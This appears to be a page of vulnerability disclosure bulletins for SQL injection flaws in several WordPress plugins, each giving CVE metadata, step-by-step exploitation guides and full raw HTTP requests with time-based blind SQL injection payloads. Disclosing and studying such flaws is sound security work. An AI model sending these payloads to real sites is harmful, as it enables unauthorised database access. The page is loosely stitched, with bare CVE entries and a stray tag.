The Web Invoice WordPress plugin through 2.1.3 does not properly sanitize and escape a parameter before using it in a SQL statement, leading to a SQL Injection exploitable by high privilege users such as admin by default. However, depending on the plugin configuration, other users, such as subscriber could exploit this as well

**web-invoice 2.1.3 (2/2) WordPress plugin SQL injection****Vulnerability Metadata**

Key

Value

Date of Disclosure

December 12 2022

Affected Software

web-invoice

Affected Software Type

WordPress plugin

Version

2.1.3

Weakness

SQL Injection

CWE ID

CWE-89

CVE ID

CVE-2022-4372

CVSS 3.x Base Score

n/a

CVSS 2.0 Base Score

n/a

Reporter

Daniel Krohmer, Kunal Sharma

Reporter Contact

daniel.krohmer@iese.fraunhofer.de

Link to Affected Software

https://wordpress.org/plugins/web-invoice

Link to Vulnerability DB

https://nvd.nist.gov/vuln/detail/CVE-2022-4372

**Vulnerability Description**

The multiple_invoices[] query array parameter in web-invoice 2.1.3 is vulnerable to to SQL injection. An authenticated attacker may abuse the new_web_invoice page of the plugin to craft a malicious GET request. Depending on the plugin settings, this attack may impact any user role (subscriber or higher).

**Exploitation Guide**

**This exploit was tested with WordPress 4.2, since the plugin is not working on recent WordPress versions anymore.**

In the plugin settings, any user role can be assigned to invoice management. In this example, we use a low-privilege Subscriber role.

Create a new invoice for an arbitrary user:

Fill out the form and submit the invoice by clicking on Save and Preview:

Go to the invoice overview by clicking on Web Invoice, then click on the subject that has just been created.

Scroll down and hit Clear Log:

Clicking the previous button triggers the vulnerable request. multiple_invoices[] is the vulnerable query parameter

A POC may look like the following request:

In the code, the vulnerability is triggered by unsanitized user input of multiple_invoices[] at line 42 in ./Flow.php.

In ./Functions.php at line 75, the parameter is passed to the function web_invoice_show_message.

In this function, the malicious database is crafted at line 503 of ./Functions.php

**Exploit Payload**

**Please note that cookies and nonces need to be changed according to your user settings, otherwise the exploit will not work.**

The SQL injection can be triggered by sending the request below.

    GET /wp-admin/admin.php?page=new_web_invoice&multiple_invoices[]=31618572+AND+(SELECT+5926+FROM+(SELECT(SLEEP(5)))erUA)&multiple_invoices[]=31618572+AND+(SELECT+5926+FROM+(SELECT(SLEEP(5)))erUA)&web_invoice_action=clear_log HTTP/1.1
    Host: localhost
    User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Connection: close
    Referer: http://localhost/wp-admin/admin.php?page=new_web_invoice&web_invoice_action=doInvoice&invoice_id=31618572
    Cookie: wordpress_86a9106ae65537651a8e456835b316ab=subscriber%7C1669997060%7CQdxLUgq9Wz8z38XxdX2XGFlZGfCPfJ749H8TSkI3bVk%7C4d290f74d0fdee6ed52774b0827884c4a4ac8f0515fbe0c2ccd89c9093b52f90; wplrp_subscriber_id=6; wp_woocommerce_session_86a9106ae65537651a8e456835b316ab=1%7C%7C1669972640%7C%7C1669969040%7C%7C4e12cab99480b80c0ee581a6517239e4; wp-settings-1=libraryContent%3Dbrowse%26mfold%3Do; wp-settings-time-1=1669802217; wp-settings-time-2=1669824525; XDEBUG_SESSION=netbeans-xdebug; wordpress_test_cookie=WP+Cookie+check; wordpress_logged_in_86a9106ae65537651a8e456835b316ab=subscriber%7C1669997060%7CQdxLUgq9Wz8z38XxdX2XGFlZGfCPfJ749H8TSkI3bVk%7C7264237c5bb535f6d1e5efa1bf3cb1db26c41b5a279f134aa8004c585e6e0ee7
    Upgrade-Insecure-Requests: 1
    Sec-Fetch-Dest: document
    Sec-Fetch-Mode: navigate
    Sec-Fetch-Site: same-origi
    Sec-Fetch-User: ?1

CVE-2022-4372: Security Bulletin

CVE-2022-4371

The multimedial images WordPress plugin through 1.0b does not properly sanitize and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by users with a role as low as Admin.

**multimedial-images 1.0b WordPress plugin SQL injection****Vulnerability Metadata**

Key

Value

Date of Disclosure

December 12 2022

Affected Software

multimedial-images

Affected Software Type

WordPress plugin

Version

1.0b

Weakness

SQL Injection

CWE ID

CWE-89

CVE ID

CVE-2022-4370

CVSS 3.x Base Score

n/a

CVSS 2.0 Base Score

n/a

Reporter

Daniel Krohmer, Kunal Sharma

Reporter Contact

daniel.krohmer@iese.fraunhofer.de

Link to Affected Software

https://wordpress.org/plugins/multimedial-images/

Link to Vulnerability DB

https://nvd.nist.gov/vuln/detail/CVE-2022-4370

**Vulnerability Description**

The id query parameter in multimedial-images 1.0b is vulnerable to SQL injection. An authenticated attacker may abuse the mmi page of the plugin to craft a malicious GET request.

**Exploitation Guide**

**This exploit was tested with WordPress 4.2, since the plugin is not working on recent WordPress versions anymore.**

Login as admin user. This attack requires at least admin privileges.

Go to the Settings and then select Multimedial Images.

Uploade an image.

Select an arbitrary image file...

... and Save all changes.

Since the plugin is very buggy, you may need to insert the image path manually by clicking on Media Library...

... and Show...

... and Insert Into Post.

Save the image.

Next, click on Remove.

Clicking the previous button triggers the vulnerable request. id is the vulnerable query parameter.

A POC may look like the following request:

In the code, the vulnerability is triggered by unsanitized user input of id at line 100 in ./ultimedial_imagenes.php.

The final database query is called within the del_background function at line 90 in file ./multimedial_imagenes.php.

**Exploit Payload**

**Please note that cookies and nonces need to be changed according to your user settings, otherwise the exploit will not work.**

The SQL injection can be triggered by sending the request below.

    GET /wp-admin/options-general.php?page=mmi&a=delbg&id=33+AND+(SELECT+5926+FROM+(SELECT(SLEEP(5)))erUA) HTTP/1.1
    Host: localhost
    User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Connection: close
    Referer: http://localhost/wp-admin/options-general.php?page=mmi
    Cookie: wordpress_86a9106ae65537651a8e456835b316ab=admin%7C1669457141%7CotH5c3MDrzK14OdNWXfLTBa1DY9ZllG9GuO3ruqHmCl%7C2fc3d70e2428acf2c33516d5f3ead10f94aef8a67512d1c7370221f22ad3cb1b; slt=87e6b56f-e72c-4f81-8246-c2348e20528b.1; wp-settings-time-1=1668871056; wp-settings-1=libraryContent%3Dbrowse%26mfold%3Do; wordpress_test_cookie=WP+Cookie+check; wordpress_logged_in_86a9106ae65537651a8e456835b316ab=admin%7C1669457141%7CotH5c3MDrzK14OdNWXfLTBa1DY9ZllG9GuO3ruqHmCl%7C05889dde6e9a628b548d320f2834c1f11e68f1b629705454db0cbf55bf0f5a63
    Upgrade-Insecure-Requests: 1
    Sec-Fetch-Dest: document
    Sec-Fetch-Mode: navigate
    Sec-Fetch-Site: same-origin
    Sec-Fetch-User: ?1

CVE-2022-4370: Security Bulletin

The WP RSS By Publishers WordPress plugin through 0.1 does not properly sanitize and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by high privilege users such as admin

**wp-rss-by-publishers (1/3) WordPress plugin SQL injection****Vulnerability Metadata**

Key

Value

Date of Disclosure

December 09 2022

Affected Software

wp-rss-by-publishers

Affected Software Type

WordPress plugin

Version

0.1

Weakness

SQL Injection

CWE ID

CWE-89

CVE ID

CVE-2022-4360

CVSS 3.x Base Score

n/a

CVSS 2.0 Base Score

n/a

Reporter

Daniel Krohmer, Kunal Sharma

Reporter Contact

daniel.krohmer@iese.fraunhofer.de

Link to Affected Software

https://wordpress.org/plugins/wp-rss-by-publishers

Link to Vulnerability DB

https://nvd.nist.gov/vuln/detail/CVE-2022-4360

**Vulnerability Description**

The wsysadmin_publishers page of the wp-rss-by-publishers 0.1 WordPress plugin is vulnerable to SQL injection. An authenticated attacker may abuse the id parameter and craft a malicious GET request with arbitrary SQL commands.

**Exploitation Guide**

**This exploit was tested with WordPress 4.2, since the plugin is not working on recent WordPress versions anymore.**

Various tables required for the plugin to work are not created, probably due to bugs. As a workaround, the tables may be created manually in the SQL database:

    CREATE TABLE wsys_publisher (id int not null, name varchar(255) not null, description varchar (255) not null, url varchar (255) not null, status int not null, api_key varchar (255) not null, image_1 varchar (255) not null, image_2 varchar (255)  not null, image_3 varchar (255) not null, feed_count int not null, post_count int not null, published_post_count int not null, hidden_post_count int not null, pending_post_count int not null, created_at varchar (255) not null, author_id int not null);
    
    CREATE TABLE wsys_feed (id int not null, publisher_id int not null, name varchar(255) not null, url varchar (255) not null, plugin int not null, status int not null, post_count int not null, published_post_count int not null, hidden_post_count int not null, pending_post_count int not null, created_at varchar (255) not null, last_fetch varchar(255) not null, last_modified varchar(255) not null);
    
    CREATE TABLE wsys_rule (id int not null, feed_id int not null, tags varchar(255) not null, categories varchar(255) not null, publisher_id int not null);
    

Login as admin user. This attack requires at least admin privileges.

Add a new publisher and provide values for Name, URL, and Description. Ensure that the URL points to a valid RSS feed. Subsequently, hit Save.

Clicking the previous button triggers the vulnerable request. id is the vulnerable query parameter.

An exploit may look like the following:

In the code, the vulnerability is triggered by unsanitized user input of the id query parameter at line 800 in ./wp-rss-by-publisher.php.

The final database query is executed at line 76 in ./classes/wsys-db.class.php:

**Exploit Payload**

**Please note that cookies and nonces need to be changed according to your user settings, otherwise the exploit will not work.**

The SQL injection can be triggered by sending the request below.

    GET /wp-admin/admin.php?page=wsysadmin_publishers&action=delete&id=0,1)+AND+(SELECT+5926+FROM+(SELECT(SLEEP(5)))erUA HTTP/1.1
    Host: localhost
    User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Connection: close
    Referer: http://localhost/wp-admin/admin.php?page=wsysadmin_publishers
    Cookie: wordpress_86a9106ae65537651a8e456835b316ab=admin%7C1669822033%7ClJinzM5K7qiPG9We9REfsgUZcV6TUIAC4NMprJr6Kxh%7Cf3eea559c158e99ec2d37d673775cdbcbfc3d93c0664c89f6388b08014c281fa; slt=87e6b56f-e72c-4f81-8246-c2348e20528b.1; wp-settings-time-1=1668871056; wp-settings-1=libraryContent%3Dbrowse%26mfold%3Do; XDEBUG_SESSION=netbeans-xdebug; PHPSESSID=0af4269367419c0bbf6d231a32ee61e8; wordpress_test_cookie=WP+Cookie+check; wordpress_logged_in_86a9106ae65537651a8e456835b316ab=admin%7C1669822033%7ClJinzM5K7qiPG9We9REfsgUZcV6TUIAC4NMprJr6Kxh%7C252785010049c4ba6fa37a51a0ec52168de6bef203fffb7cf657ba749b7a5a81
    Upgrade-Insecure-Requests: 1
    Sec-Fetch-Dest: document
    Sec-Fetch-Mode: navigate
    Sec-Fetch-Site: same-origin
    Sec-Fetch-User: ?1

CVE-2022-4360: Security Bulletin

**wp-rss-by-publishers (2/3) WordPress plugin SQL injection****Vulnerability Metadata**

Key

Value

Date of Disclosure

December 09 2022

Affected Software

wp-rss-by-publishers

Affected Software Type

WordPress plugin

Version

0.1

Weakness

SQL Injection

CWE ID

CWE-89

CVE ID

CVE-2022-4359

CVSS 3.x Base Score

n/a

CVSS 2.0 Base Score

n/a

Reporter

Daniel Krohmer, Kunal Sharma

Reporter Contact

daniel.krohmer@iese.fraunhofer.de

Link to Affected Software

https://wordpress.org/plugins/wp-rss-by-publishers

Link to Vulnerability DB

https://nvd.nist.gov/vuln/detail/CVE-2022-4359

**Vulnerability Description**

The wsysadmin_feeds page of the wp-rss-by-publishers 0.1 WordPress plugin is vulnerable to SQL injection. An authenticated attacker may abuse the id parameter and craft a malicious GET request with arbitrary SQL commands.

**Exploitation Guide**

**This exploit was tested with WordPress 4.2, since the plugin is not working on recent WordPress versions anymore.**

Various tables required for the plugin to work are not created, probably due to bugs. As a workaround, the tables may be created manually in the SQL database:

    CREATE TABLE wsys_publisher (id int not null, name varchar(255) not null, description varchar (255) not null, url varchar (255) not null, status int not null, api_key varchar (255) not null, image_1 varchar (255) not null, image_2 varchar (255)  not null, image_3 varchar (255) not null, feed_count int not null, post_count int not null, published_post_count int not null, hidden_post_count int not null, pending_post_count int not null, created_at varchar (255) not null, author_id int not null);
    
    CREATE TABLE wsys_feed (id int not null, publisher_id int not null, name varchar(255) not null, url varchar (255) not null, plugin int not null, status int not null, post_count int not null, published_post_count int not null, hidden_post_count int not null, pending_post_count int not null, created_at varchar (255) not null, last_fetch varchar(255) not null, last_modified varchar(255) not null);
    
    CREATE TABLE wsys_rule (id int not null, feed_id int not null, tags varchar(255) not null, categories varchar(255) not null, publisher_id int not null);
    

Login as admin user. This attack requires at least admin privileges.

Add a new publisher and provide values for Name, URL, and Description. Ensure that the URL points to a valid RSS feed. Subsequently, hit Save.

Hover over the name of the publisher that has been created and select Edit.

Clicking the previous button triggers the following request:

However, for the vulnerable request, some modifications are necessary: The wsysadmin_publishers page needs to be changed to wsysadmin_feeds. Then, id is the vulnerable query parameter:

An exploit may look like the following:

In the code, the update_feeds function handles different page inputs, in this case wsysadmin_feeds at line 817 in ./wp-rss-by-publisher.php.

In case the action is set to delete and id holds a value, the WSYS_Feed::delete method is called, again passing the vulnerable id parameter at line 887 in ./wp-rss-by-publisher.php.

The final database query is called at line 76 in ./classes/wsys-db.class.php.

**Exploit Payload**

**Please note that cookies and nonces need to be changed according to your user settings, otherwise the exploit will not work.**

The SQL injection can be triggered by sending the request below.

    GET /wp-admin/admin.php?page=wsysadmin_feeds&action=delete&id=0,1)+AND+(SELECT+5926+FROM+(SELECT(SLEEP(5)))erUA HTTP/1.1
    Host: localhost
    User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Connection: close
    Referer: http://localhost/wp-admin/admin.php?page=wsysadmin_publishers
    Cookie: wordpress_86a9106ae65537651a8e456835b316ab=admin%7C1669822033%7ClJinzM5K7qiPG9We9REfsgUZcV6TUIAC4NMprJr6Kxh%7Cf3eea559c158e99ec2d37d673775cdbcbfc3d93c0664c89f6388b08014c281fa; slt=87e6b56f-e72c-4f81-8246-c2348e20528b.1; wp-settings-time-1=1668871056; wp-settings-1=libraryContent%3Dbrowse%26mfold%3Do; XDEBUG_SESSION=netbeans-xdebug; PHPSESSID=0af4269367419c0bbf6d231a32ee61e8; wordpress_test_cookie=WP+Cookie+check; wordpress_logged_in_86a9106ae65537651a8e456835b316ab=admin%7C1669822033%7ClJinzM5K7qiPG9We9REfsgUZcV6TUIAC4NMprJr6Kxh%7C252785010049c4ba6fa37a51a0ec52168de6bef203fffb7cf657ba749b7a5a81
    Upgrade-Insecure-Requests: 1
    Sec-Fetch-Dest: document
    Sec-Fetch-Mode: navigate
    Sec-Fetch-Site: same-origin
    Sec-Fetch-User: ?1

CVE-2022-4359: Security Bulletin

CVE-2022-4358

The LetsRecover WordPress plugin through 1.1.0 does not properly sanitise and escape a parameter before using it in a SQL statement via an AJAX action available to unauthenticated users, leading to a SQL injection.

CVE-2022-4357

The LetsRecover WordPress plugin through 1.1.0 does not properly sanitise and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by high privilege users such as admin

CVE-2022-4356

CVE-2022-4355

The Qe SEO Handyman WordPress plugin through 1.0 does not properly sanitize and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by high privilege users such as admin

**qe-seo-handyman 1.0 (2/2) WordPress plugin SQL injection****Vulnerability Metadata**

Key

Value

Date of Disclosure

December 08 2022

Affected Software

qe-seo-handyman

Affected Software Type

WordPress plugin

Version

1.0

Weakness

SQL Injection

CWE ID

CWE-89

CVE ID

CVE-2022-4352

CVSS 3.x Base Score

n/a

CVSS 2.0 Base Score

n/a

Reporter

Daniel Krohmer, Kunal Sharma

Reporter Contact

daniel.krohmer@iese.fraunhofer.de

Link to Affected Software

https://wordpress.org/plugins/qe-seo-handyman

Link to Vulnerability DB

https://nvd.nist.gov/vuln/detail/CVE-2022-4352

**Vulnerability Description**

The import_meta action in qe-seo-handyman 1.0 is vulnerable to SQL injection. An authenticated attacker may abuse the CSV file upload functionality to craft a malicious POST request.

**Exploitation Guide**

Login as admin user. This attack requires at least admin privileges.

The plugin requires all-in-one-seo-pack to be activated.

Head to Qe SEO handy-man.

Click on the link at Step 3 to import a CSV file:

Click on Browse... and select a valid CSV file.

A sample CSV file may look like the following:

    post_id,url,post_title,wpseo_title,wpseo_metadesc,type,term_taxonomy_id
    5,http://localhost/?taxonomy=bp-email-type&term=activity-at-message,activity-at-message,test,test,bp-email-type,5
    

Then, click Submit:

After uploading, hit Continue.

Clicking the previous button triggers the vulnerable request. The post_id[] array is the vulnerable parameter:

A request may look like the following:

In the code, the vulnerable $post_id variable is written at line 90 in ./inc/QE-Seo-handyman-import-csv.php.

The final database query is executed at line 128 of the same file.

**Exploit Payload**

**Please note that cookies and nonces need to be changed according to your user settings, otherwise the exploit will not work.**

The SQL injection can be triggered by sending the request below.

    POST /wp-admin/admin-post.php HTTP/1.1
    Host: localhost
    User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Referer: http://localhost/wp-admin/admin.php?page=qe-seo-handyman&tab=import
    Content-Type: multipart/form-data; boundary=---------------------------8468852133354988763032646215
    Content-Length: 1377
    Origin: http://localhost
    Connection: close
    Cookie: wordpress_86a9106ae65537651a8e456835b316ab=admin%7C1666354651%7C5hcpdLYnfCYlULiNoxvsLbX15Xk3355i128JO4Rpaec%7C9052465964755f7df388ca7ded12dea9ba2a5fbb3515169d1c4e2f2792cafad2; wp_woocommerce_session_86a9106ae65537651a8e456835b316ab=1%7C%7C1666351832%7C%7C1666348232%7C%7Cc2cb50590cfa7e94229c1621767b0523; wp-settings-1=editor%3Dtinymce%26ampamphidetb%3D1%26ampampmfold%3Do%26mfold%3Do; wp-settings-time-1=1666181852; XDEBUG_SESSION=netbeans-xdebug; wordpress_test_cookie=WP%20Cookie%20check; tk_ai=woo%3AxIFtmbzi40NKIXvwVmH3Vwly; woocommerce_items_in_cart=1; woocommerce_cart_hash=0ed611221b3d80f0fa539cbbda99650c; wp_lang=en_US; wordpress_logged_in_86a9106ae65537651a8e456835b316ab=admin%7C1666354651%7C5hcpdLYnfCYlULiNoxvsLbX15Xk3355i128JO4Rpaec%7Cc6b068ebe7c94a69ba9c603924cf21ddd8463427f2fea34e380736f338a7a6d5
    Upgrade-Insecure-Requests: 1
    Sec-Fetch-Dest: document
    Sec-Fetch-Mode: navigate
    Sec-Fetch-Site: same-origin
    Sec-Fetch-User: ?1
    
    -----------------------------8468852133354988763032646215
    Content-Disposition: form-data; name="action"
    
    import_meta
    -----------------------------8468852133354988763032646215
    Content-Disposition: form-data; name="nonce"
    
    62bfc7851f
    -----------------------------8468852133354988763032646215
    Content-Disposition: form-data; name="wpseo_title[]"
    
    test
    -----------------------------8468852133354988763032646215
    Content-Disposition: form-data; name="wpseo_desc[]"
    
    test
    -----------------------------8468852133354988763032646215
    Content-Disposition: form-data; name="term_id[]"
    
    5
    -----------------------------8468852133354988763032646215
    Content-Disposition: form-data; name="permalink[]"
    
    http://localhost/?taxonomy=bp-email-type&term=activity-at-message
    -----------------------------8468852133354988763032646215
    Content-Disposition: form-data; name="taxonomy[]"
    
    bp-email-type
    -----------------------------8468852133354988763032646215
    Content-Disposition: form-data; name="wpseo_focuskw[]"
    
    activity-at-message
    -----------------------------8468852133354988763032646215
    Content-Disposition: form-data; name="post_id[]"
    
    5 AND (SELECT 3477 FROM (SELECT(SLEEP(5)))DhVP)
    -----------------------------8468852133354988763032646215
    Content-Disposition: form-data; name="submit"
    
    Submit
    -----------------------------8468852133354988763032646215--

Tag

#perl